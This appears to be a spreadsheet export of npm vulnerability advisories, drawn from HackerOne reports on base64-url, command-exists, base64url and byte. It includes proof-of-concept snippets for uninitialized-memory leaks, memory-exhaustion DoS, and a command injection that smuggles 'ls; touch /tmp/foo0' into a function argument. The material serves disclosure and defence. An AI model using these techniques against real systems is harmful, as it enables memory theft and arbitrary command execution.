&lt;p&gt;On Node.js 6.x and below, this exposes uninitialized memory, which could contain sensitive data.&lt;/p&gt;
&lt;p&gt;This can be also used to cause a DoS on any Node.js version by consuming the memory when large numbers are passed on input.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;console.log(require(&amp;#39;base64-url&amp;#39;).encode(1000))&lt;/code&gt; (Node.js 6.x and lower â€” note uninitialized memory in output)&lt;/p&gt;
&lt;p&gt;&lt;code&gt;require(&amp;#39;base64-url&amp;#39;).encode(1e8)&lt;/code&gt; (any Node.js verision â€” note memory usage and time)&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;OS: Arch Linux current&lt;/li&gt;
&lt;li&gt;Node.js 6.13.0&lt;/li&gt;
&lt;li&gt;Node.js 9.5.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: Y&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I contacted the author on 2017-03-02.&lt;br&gt;
I did not receive a reply, but on 2017-08-17 a semver-major version 2.0.0 was released with a fix.&lt;/p&gt;
&lt;p&gt;I want a CVE assigned to this issue, also I would prefer the fix to be backported to 1.x branch â€” a lot of modules still depend 1.x as of 2018-02-26.&lt;/p&gt;
&lt;p&gt;Top-10 apps &lt;code&gt;@latest&lt;/code&gt; versions of which install affected &lt;code&gt;base64-url@1&lt;/code&gt; through their deps chains:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;664945  react-native
346288  metro-bundler
83764   hubot
81089   sails
51724   phonegap
45522   csrf-tokens
28326   hubot-mock-adapter
25778   mock-hubot
23712   connect-phonegap
18808   nodedata
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In total, there are about 2460 such apps in the npm registry, to my knowledge.&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Sensitive uninitialized memory exposure on Node.js 6.x or lower&lt;br&gt;
Denail of Service on any Node.js version&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-03T23:51:59.031Z</t>
  </si>
  <si>
    <t>2018-05-12T09:10:34.245Z</t>
  </si>
  <si>
    <t>The problem arises when a number is passed in, e.g. from user-submitted JSON-encoded data.
The API should not propagate the already-bad Buffer issue further.</t>
  </si>
  <si>
    <t>Sensitive uninitialized memory exposure on Node.js 6.x or lower
Denail of Service on any Node.js version</t>
  </si>
  <si>
    <t xml:space="preserve">report uninitialized Buffer allocation issue base64 url. allows extract sensitive data uninitialized memory cause DoS passing large number, setups typed user input passed (e.g. JSON).  Module  module name  base64 url version  1.3.3 npm page  https //www.npmjs.com/package/base64 url  Module Description   Base64 encode, decode, escape unescape URL applications.   Module Stats  48 047 downloads last day 311 047 downloads last week 1 374 420 downloads last month  Vulnerability  Vulnerability Description  problem arises when number passed in, e.g. user submitted JSON encoded data. API not propagate already bad Buffer issue further.  6.x below, exposes uninitialized memory, contain sensitive data.  used cause DoS version consuming memory when large numbers passed input.  Steps Reproduce   console.log(require("base64 url").encode(1000)) (Node.js 6.x lower â€” note uninitialized memory output)  require("base64 url").encode(1e8) (any verision â€” note memory usage time)  Supporting Material/References    OS  Arch Linux current 6.13.0 9.5.0   Wrap   contacted maintainer let know  Y opened issue related repository  N   contacted author 2017 03 02. not receive reply, 2017 08 17 semver major version 2.0.0 released fix.  want CVE assigned issue, prefer fix backported 1.x branch â€” lot modules depend 1.x 2018 02 26.  Top 10 apps @latest versions install affected base64 url@1 deps chains  664945  react native 346288  metro bundler 83764   hubot 81089   sails 51724   phonegap 45522   csrf tokens 28326   hubot mock adapter 25778   mock hubot 23712   connect phonegap 18808   nodedata  total, 2460 apps npm registry, knowledge.  Impact  Sensitive uninitialized memory exposure 6.x lower Denail Service version </t>
  </si>
  <si>
    <t>Sensitive uninitialized memory exposure 6.x lower
Denail Service version</t>
  </si>
  <si>
    <t>`command-exists` concatenates unsanitized input into exec()/execSync() commands</t>
  </si>
  <si>
    <t>/advisories/659</t>
  </si>
  <si>
    <t>2018-05-16T19:23:23.763+00:00</t>
  </si>
  <si>
    <t>command-exists</t>
  </si>
  <si>
    <t>https://www.npmjs.com/command-exists</t>
  </si>
  <si>
    <t>&lt;=1.2.3</t>
  </si>
  <si>
    <t>&gt;=1.2.4</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/324453.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report command injection in &lt;code&gt;command-exists&lt;/code&gt;.&lt;br&gt;
It allows to inject and execute arbitrary shell commands while trying to determine if a crafted command exists.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;command-exists&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.2.2&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/command-exists&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;node module to check if a command-line command exists&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;5 480 downloads in the last day&lt;br&gt;
74 405 downloads in the last week&lt;br&gt;
294 869 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;commandName&lt;/code&gt; argument is not properly escaped before being concatenated into the command that is passed to &lt;code&gt;exec()&lt;/code&gt;/&lt;code&gt;execSync()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;See &lt;a title="https://github.com/mathisonian/command-exists/blob/v1.2.2/lib/command-exists.js#L49-L94" href="/redirect?signature=e6f5823dd2ebe515b185474e6abc73cb265e92ac&amp;amp;url=https%3A%2F%2Fgithub.com%2Fmathisonian%2Fcommand-exists%2Fblob%2Fv1.2.2%2Flib%2Fcommand-exists.js%23L49-L94" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/mathisonian/command-exists/blob/v1.2.2/lib/command-exists.js#L49-L94&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;commandExists&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;command-exists&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nx"&gt;commandExists&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;ls; touch /tmp/foo0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nx"&gt;commandExists&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;ls; touch /tmp/foo1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Observe &lt;code&gt;/tmp/foo0&lt;/code&gt; and &lt;code&gt;/tmp/foo1&lt;/code&gt; being created.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux current&lt;/li&gt;
&lt;li&gt;Node.js 9.7.1&lt;/li&gt;
&lt;li&gt;npm 5.7.1&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;For setups where unsanitized user input could end up in &lt;code&gt;command-exists&lt;/code&gt; argument, users would be able to execute arbitrary shell commands.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-11T17:01:51.059Z</t>
  </si>
  <si>
    <t>2018-05-11T20:06:37.907Z</t>
  </si>
  <si>
    <t>commandName argument is not properly escaped before being concatenated into the command that is passed to exec()/execSync().</t>
  </si>
  <si>
    <t>For setups where unsanitized user input could end up in command-exists argument, users would be able to execute arbitrary shell commands.</t>
  </si>
  <si>
    <t xml:space="preserve">report command injection command exists. allows inject execute arbitrary shell commands trying determine crafted command exists.  Module  module name  command exists version  1.2.2 npm page  https //www.npmjs.com/package/command exists  Module Description   node module check command line command exists   Module Stats  5 480 downloads last day 74 405 downloads last week 294 869 downloads last month  Vulnerability  Vulnerability Description  commandName argument not properly escaped concatenated command passed exec()/execSync().  https //github.com/mathisonian/command exists/blob/v1.2.2/lib/command L94  Steps Reproduce  const commandExists = require("command exists"); commandExists.sync("ls; touch /tmp/foo0"); commandExists("ls; touch /tmp/foo1");  Observe /tmp/foo0 /tmp/foo1 created.  Supporting Material/References    Arch Linux current 9.7.1 npm 5.7.1   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  setups unsanitized user input end command exists argument, users able execute arbitrary shell commands. </t>
  </si>
  <si>
    <t>setups unsanitized user input end command-exists argument, users able execute arbitrary shell commands.</t>
  </si>
  <si>
    <t>`base64url` allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below</t>
  </si>
  <si>
    <t>/advisories/658</t>
  </si>
  <si>
    <t>2018-05-16T19:17:35.704+00:00</t>
  </si>
  <si>
    <t>base64url</t>
  </si>
  <si>
    <t>https://www.npmjs.com/base64url</t>
  </si>
  <si>
    <t>&lt;3.0.0</t>
  </si>
  <si>
    <t>&gt;=3.0.0</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/321687.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report an uninitialized Buffer allocation issue in &lt;code&gt;base64url&lt;/code&gt;.&lt;br&gt;
It allows to extract sensitive data from uninitialized memory or to cause a DoS by passing in a large number, in setups where typed user input can be passed (e.g. from JSON), on Node.js 4.x and lower.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;base64url&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 2.0.0&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/base64url&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Converting to, and from, base64url&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;182 924 downloads in the last day&lt;br&gt;
1 097 142 downloads in the last week&lt;br&gt;
4 601 176 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;The problem arises when a number is passed in, e.g. from user-submitted JSON-encoded data.&lt;br&gt;
The API should not propagate the already-bad Buffer issue further.&lt;/p&gt;
&lt;p&gt;On Node.js 4.x and below (4.x is still supported), this exposes uninitialized memory, which could contain sensitive data. This can be also used to cause a DoS by consuming the memory when large numbers are passed on input.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;console.log(require(&amp;#39;base64url&amp;#39;).encode(1000))&lt;/code&gt;  (note uninitialized memory in output)&lt;br&gt;
&lt;code&gt;require(&amp;#39;base64url&amp;#39;).encode(1e8)&lt;/code&gt; (note memory usage and time)&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;State all technical information about the stack where the vulnerability was found&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux Current&lt;/li&gt;
&lt;li&gt;Node.js 4.8.7&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: Y&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository:  N&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I tried to contact the maintainer over email, first time on 2017-03-02, last time on 2018-02-18, but did not receive a reply.&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Sensitive uninitialized memory exposure&lt;br&gt;
Denail of Service&lt;br&gt;
This issue affects only setups using Node.js 4.x (still supported) or lower.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-03T23:35:58.959Z</t>
  </si>
  <si>
    <t>2018-05-11T20:18:15.861Z</t>
  </si>
  <si>
    <t xml:space="preserve">report uninitialized Buffer allocation issue base64url. allows extract sensitive data uninitialized memory cause DoS passing large number, setups typed user input passed (e.g. JSON), 4.x lower.  Module  module name  base64url version  2.0.0 npm page  https //www.npmjs.com/package/base64url  Module Description   Converting to, from, base64url   Module Stats  182 924 downloads last day 1 097 142 downloads last week 4 601 176 downloads last month  Vulnerability  Vulnerability Description  problem arises when number passed in, e.g. user submitted JSON encoded data. API not propagate already bad Buffer issue further.  4.x below (4.x supported), exposes uninitialized memory, contain sensitive data. used cause DoS consuming memory when large numbers passed input.  Steps Reproduce   console.log(require("base64url").encode(1000))  (note uninitialized memory output) require("base64url").encode(1e8) (note memory usage time)  Supporting Material/References    State technical information stack vulnerability found    Arch Linux Current 4.8.7   Wrap   contacted maintainer let know  Y opened issue related repository   N   tried contact maintainer email, first time 2017 03 02, last time 2018 02 18, not receive reply.  Impact  Sensitive uninitialized memory exposure Denail Service issue affects setups using 4.x (still supported) lower. </t>
  </si>
  <si>
    <t>`byte` allocates uninitialized buffers and reads data from them past the initialized length</t>
  </si>
  <si>
    <t>/advisories/657</t>
  </si>
  <si>
    <t>2018-05-16T17:56:12.518+00:00</t>
  </si>
  <si>
    <t>byte</t>
  </si>
  <si>
    <t>https://www.npmjs.com/byte</t>
  </si>
  <si>
    <t>&lt;=1.4.0</t>
  </si>
  <si>
    <t>&gt;=1.4.1</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/330351.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report a memory exposure vulnerbaility in &lt;code&gt;byte&lt;/code&gt;&lt;br&gt;
It allows to extract process memory using Buffers in some cases.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;byte&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.4.0&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/byte&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Input Buffer and Output Buffer, just like Java ByteBuffer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;705 downloads in the last day&lt;br&gt;
3 836 downloads in the last week&lt;br&gt;
14 813 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;byte&lt;/code&gt; allocates uninitialized buffers on all Node.js versions, even on the ones that zero-full &lt;code&gt;new Buffer()&lt;/code&gt; by default, as it uses &lt;code&gt;.allocUnsafe()&lt;/code&gt;. It provides an API for writing data and an API for reading data from the buffer, but the internal buffer is not zero-filled and the API for reading does not validate that the memory being read was ever initialized.&lt;/p&gt;
&lt;p&gt;I also don&amp;#39;t think this corresponds to behavior  of the Java ByteBuffer â€” that one is zero-filled afaik.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ByteBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;byte&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="nx"&gt;e4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;bb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;ByteBuffer&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;180&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;bb&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;putString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;ok&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bb&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; {&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;s&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Finished at attempt: &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ByteBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;byte&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="nx"&gt;e4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;bb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;ByteBuffer&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;allocate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;twos&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;Buffer&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;alloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nx"&gt;bb&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;twos&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bb&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; {&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Finished at attempt: &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;k&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="patch"&gt;Patch&lt;/h2&gt;
&lt;p&gt;Replace all &lt;code&gt;Buffer(num)&lt;/code&gt; and &lt;code&gt;Buffer.allocUnsafe(num)&lt;/code&gt; usage with &lt;code&gt;Buffer.alloc(num)&lt;/code&gt; and use a polyfill, e.g. &lt;a href="/redirect?signature=cb30ab42bdd69ccae7907c23f16a5f43d513769b&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fsafer-buffer" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;safer-buffer&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt; or &lt;a href="/redirect?signature=b5ca5938eb4c47035d5897918c280527647b0da7&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fbuffer-alloc" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;buffer-alloc&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;OS: Arch Linux current&lt;/li&gt;
&lt;li&gt;Node.js 9.9.0&lt;/li&gt;
&lt;li&gt;npm 5.8.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Read process memory containing sensitive information.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-27T13:37:06.258Z</t>
  </si>
  <si>
    <t>2018-05-11T20:25:26.435Z</t>
  </si>
  <si>
    <t>byte allocates uninitialized buffers on all Node.js versions, even on the ones that zero-full new Buffer() by default, as it uses .allocUnsafe(). It provides an API for writing data and an API for reading data from the buffer, but the internal buffer is not zero-filled and the API for reading does not validate that the memory being read was ever initialized.</t>
  </si>
  <si>
    <t>Read process memory containing sensitive information.</t>
  </si>
  <si>
